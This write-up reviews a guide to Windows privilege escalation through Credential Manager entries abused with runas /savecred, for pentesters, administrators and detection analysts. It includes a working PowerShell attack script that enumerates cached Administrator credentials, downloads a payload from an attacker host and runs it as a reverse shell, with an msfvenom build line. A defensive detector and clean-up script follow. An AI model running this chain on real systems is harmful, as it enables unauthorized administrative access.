
Windows Privilege Escalation: Stored Credentials (Runas)

by Endpoint Operations Assurance

A practical evaluation of the Windows Credential Manager, detailing how attackers use native `cmdkey` enumeration and the `runas /savecred` flag to run code in a more privileged account's security context.

“Stored Credentials Exploitation is a technique attackers use to escalate their access seamlessly. The Windows Credential Manager acts as a digital vault, but if an administrator has cached their credentials, an attacker can extract that privilege linearly without ever knowing the password.”

Modern Windows operating systems are designed heavily around user convenience. To spare users and administrators from repeatedly typing complex passwords for mapped network drives or administrative applications, Windows caches those credentials in the Credential Manager. Windows Privilege Escalation: Stored Credentials (Runas) provides a step-by-step breakdown of how attackers locate these cached credentials and piggyback on them to run code in the Administrator's context, from which SYSTEM is one short step away.

Enumerating the Digital Vault

The guide skips the graphical Control Panel interface a standard user would normally open and focuses on pure command-line execution for the remote operator. When an attacker lands on a compromised host as a low-privileged user, the very first step in this methodology is running the native binary cmdkey /list. One caveat the scenario depends on: the Credential Manager vault is per-user, so cmdkey /list shows only the credentials saved by the account it runs as; the privileged entry has to have been saved from that same compromised account.

The text highlights exactly what an attacker is hunting for in the output: a cached credential explicitly linked to the Administrator account or an enterprise Domain Admin. A credential saved by an earlier runas /savecred shows up with a target of the form Domain:interactive=WORKGROUP\Administrator and Type: Domain Password. Finding such an entry confirms the system is holding a highly privileged credential ready for use.

Weaponizing the Runas Binary

The core of the exploitation does not involve cracking a password hash; it relies entirely on native Windows functionality. The guide outlines how to abuse the runas.exe executable, specifically its /savecred flag.

By chaining these concepts, the guide details an elegant attack sequence:

  1. Payload Generation: Generating a malicious executable (shell.exe) with msfvenom and transferring it to the target's Downloads folder via a PowerShell web request.
  2. Context Switching: Executing the payload via the command: runas /savecred /user:WORKGROUP\Administrator shell.exe. The command as written assumes shell.exe is in the current directory; passing the full path is the safer habit.
  3. Privilege Escalation: Because /savecred instructs runas to use the password cached for that account in the Credential Manager, the reverse shell runs under the Administrator's security context without the attacker ever typing the password. Two conditions apply: if no credential is cached for the account, or the Windows edition ignores /savecred (Home editions do), runas falls back to prompting for a password and an unattended session stalls; and runas does not elevate through UAC, so it yields a full administrative token only for accounts exempt from UAC filtering, which the built-in Administrator is by default.
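The enumeration and runas steps above, as one added PowerShell example; this is not code from the guide. It parses cmdkey /list into objects, keeps only entries a saved-credential runas can consume for a privileged account, and launches the payload with /savecred. The payload URL, the local path under C:\Users\lowpriv\Downloads and the account WORKGROUP\Administrator are hypothetical, and the msfvenom line in the comment is the attacker-side step the guide describes.

```powershell
# Added example, not the guide's own code. Assumes a shell as a low-privileged user and a
# payload hosted at $PayloadUrl (hypothetical). Build it on the attacking host first, e.g.
#   msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker> LPORT=4444 -f exe -o shell.exe

function Get-StoredCredential {
    # Parse 'cmdkey /list'. Entries are Target:/Type:/User: line groups and cover ONLY the
    # vault of the account running cmdkey, because Credential Manager is per-user.
    $entries = @()
    $current = $null
    foreach ($line in (cmdkey /list)) {
        $text = $line.Trim()
        if ($text -match '^Target:\s*(.+)$') {
            if ($null -ne $current) { $entries += $current }
            $current = [pscustomobject]@{ Target = $Matches[1]; Type = ''; User = '' }
        } elseif ($null -ne $current -and $text -match '^Type:\s*(.+)$') {
            $current.Type = $Matches[1]
        } elseif ($null -ne $current -and $text -match '^User:\s*(.+)$') {
            $current.User = $Matches[1]
        }
    }
    if ($null -ne $current) { $entries += $current }
    return $entries
}

function Find-RunasCandidate {
    # Entries written by an earlier 'runas /savecred' appear as
    # 'Domain:interactive=<DOMAIN>\<user>'. Keep those whose user is on the privileged list.
    param([string[]]$PrivilegedUsers = @('Administrator'))
    Get-StoredCredential | Where-Object {
        $_.Target -like 'Domain:interactive=*' -and
        $PrivilegedUsers -contains ($_.User -split '\\')[-1]
    }
}

function Invoke-SavedCredRunas {
    param(
        [Parameter(Mandatory)][string]$User,        # e.g. 'WORKGROUP\Administrator'
        [Parameter(Mandatory)][string]$PayloadPath, # full path, so it does not depend on the working directory
        [string]$PayloadUrl                         # optional: fetch the payload first
    )
    if ($PayloadUrl) {
        Invoke-WebRequest -Uri $PayloadUrl -OutFile $PayloadPath -UseBasicParsing
    }
    if (-not (Test-Path -LiteralPath $PayloadPath)) { throw "payload not found: $PayloadPath" }
    # /savecred makes runas read the password cached for $User instead of asking for it.
    # With nothing cached for that account, or on an edition that ignores /savecred (Home),
    # runas prompts for a password and an unattended session hangs, so only call this
    # after Find-RunasCandidate reported a matching entry.
    runas.exe /savecred "/user:$User" $PayloadPath
}

# Hypothetical values for illustration.
$candidate = Find-RunasCandidate | Select-Object -First 1
if ($candidate) {
    Invoke-SavedCredRunas -User $candidate.User `
        -PayloadPath 'C:\Users\lowpriv\Downloads\shell.exe' `
        -PayloadUrl  'http://10.10.14.5/shell.exe'
} else {
    Write-Host 'No saved privileged credential in this user''s vault; this path is closed.'
}
```

Find-RunasCandidate is deliberately narrow: it looks for exactly the entry shape the guide tells you to hunt for, and running it before the runas call is what keeps the attack from stalling on a password prompt when the vault is empty.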

Who Is This Book REALLY For?

  • Penetration Testers: A dedicated reminder to always check cmdkey /list during the initial enumeration phase. If an administrator was careless, the path to an Administrator shell takes exactly two commands.
  • System Administrators: An aggressive warning illustrating why administrators must never save privileged credentials in the Credential Manager of a low-privileged account on a user workstation.
  • Endpoint Detection & Response (EDR) Analysts: Outlining the specific behavioral chain, cmdkey enumeration immediately followed by a runas execution that spawns a network-connected binary, which strongly indicates an attacker is pivoting through stored credentials.
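Detection logic for the behavioral chain in the last bullet, plus the clean-up an administrator would apply, as an added PowerShell example that is not part of the original page. It runs over constructed Sysmon-style process and network events (host WS01, user lowpriv, destination 10.10.14.5:4444 are made up) and flags a /savecred runas whose target account then runs a binary out of the low-privileged user's profile; the DisableDomainCreds registry value is the backing store of the policy "Network access: Do not allow storage of passwords and credentials for network authentication".

```powershell
# Added example, not from the guide. Field names (Time, Kind, Pid, User, Image,
# CommandLine, Destination) are an assumed normalisation of Sysmon event 1/3 records.

$SampleEvents = @(
    [pscustomobject]@{ Time = [datetime]'2024-05-01T10:00:00'; Kind = 'Process'; Pid = 4100; User = 'WS01\lowpriv'
                       Image = 'C:\Windows\System32\cmdkey.exe'; CommandLine = 'cmdkey /list' }
    [pscustomobject]@{ Time = [datetime]'2024-05-01T10:00:40'; Kind = 'Process'; Pid = 4120; User = 'WS01\lowpriv'
                       Image = 'C:\Windows\System32\runas.exe'
                       CommandLine = 'runas /savecred /user:WORKGROUP\Administrator C:\Users\lowpriv\Downloads\shell.exe' }
    [pscustomobject]@{ Time = [datetime]'2024-05-01T10:00:41'; Kind = 'Process'; Pid = 4132; User = 'WS01\Administrator'
                       Image = 'C:\Users\lowpriv\Downloads\shell.exe'; CommandLine = 'C:\Users\lowpriv\Downloads\shell.exe' }
    [pscustomobject]@{ Time = [datetime]'2024-05-01T10:00:42'; Kind = 'Network'; Pid = 4132; User = 'WS01\Administrator'
                       Image = 'C:\Users\lowpriv\Downloads\shell.exe'; Destination = '10.10.14.5:4444' }
    # Benign: a plain runas without /savecred, which this detector must not flag.
    [pscustomobject]@{ Time = [datetime]'2024-05-01T11:30:00'; Kind = 'Process'; Pid = 5000; User = 'WS01\alice'
                       Image = 'C:\Windows\System32\runas.exe'; CommandLine = 'runas /user:WS01\alice2 cmd.exe' }
)

function Find-StoredCredentialPivot {
    param([object[]]$Events, [int]$WindowMinutes = 10)
    $findings = @()
    $procs   = @($Events | Where-Object { $_.Kind -eq 'Process' })
    $netPids = @($Events | Where-Object { $_.Kind -eq 'Network' } | ForEach-Object { $_.Pid })
    $runasEvents = @($procs | Where-Object { $_.Image -like '*\runas.exe' -and $_.CommandLine -match '(?i)/savecred' })

    foreach ($r in $runasEvents) {
        if (-not ($r.CommandLine -match '(?i)/user:(\S+)')) { continue }
        $targetUser = ($Matches[1] -split '\\')[-1]   # account named in /user:
        $sourceUser = ($r.User -split '\\')[-1]       # account that ran runas
        $before = $r.Time.AddMinutes(-$WindowMinutes)
        $after  = $r.Time.AddMinutes($WindowMinutes)

        # Stage 1: the same low-privileged account enumerated its vault shortly before.
        $enumerated = [bool]($procs | Where-Object {
            $_.User -eq $r.User -and $_.Image -like '*\cmdkey.exe' -and
            $_.CommandLine -match '(?i)/list' -and $_.Time -ge $before -and $_.Time -le $r.Time })

        # Stage 3: a process now running as the target account but launched from the
        # low-privileged user's profile, which is abnormal for an administrator.
        $spawned = @($procs | Where-Object {
            ($_.User -split '\\')[-1] -eq $targetUser -and
            $_.Image -like "C:\Users\$sourceUser\*" -and
            $_.Time -ge $r.Time -and $_.Time -le $after })

        foreach ($p in $spawned) {
            $network  = $netPids -contains $p.Pid     # the spawned binary went out to the network
            $severity = 'Medium'
            if ($enumerated -and $network) { $severity = 'High' }
            $findings += [pscustomobject]@{
                Time = $r.Time; SourceUser = $r.User; TargetUser = $targetUser
                Payload = $p.Image; Enumerated = $enumerated; NetworkOut = $network; Severity = $severity
            }
        }
    }
    return $findings
}

function Remove-SavedRunasCredential {
    # Clean-up. Run inside the session of the user whose vault holds the entry; cmdkey cannot
    # reach another user's vault. $Target is the exact 'Target:' string cmdkey /list printed.
    param([Parameter(Mandatory)][string]$Target)
    cmdkey "/delete:$Target"
    # Prevent new ones: DisableDomainCreds=1 is the policy "Network access: Do not allow
    # storage of passwords and credentials for network authentication" (needs admin rights).
    Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name 'DisableDomainCreds' -Value 1 -Type DWord
}

Find-StoredCredentialPivot -Events $SampleEvents | Format-Table -AutoSize
```

The detector keys on the account context of the spawned process rather than on its parent PID, because a process started through runas is created by the Secondary Logon service rather than directly by runas.exe; an administrator account executing a binary from another user's Downloads folder is the signal that survives that indirection.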

The Bottom Line

Windows Privilege Escalation: Stored Credentials (Runas) demonstrates the real danger of administrative convenience. It effectively proves that caching a privileged credential to save a few seconds sets up an elegant, native exploit path in which the attacker never needs to know the password at all.

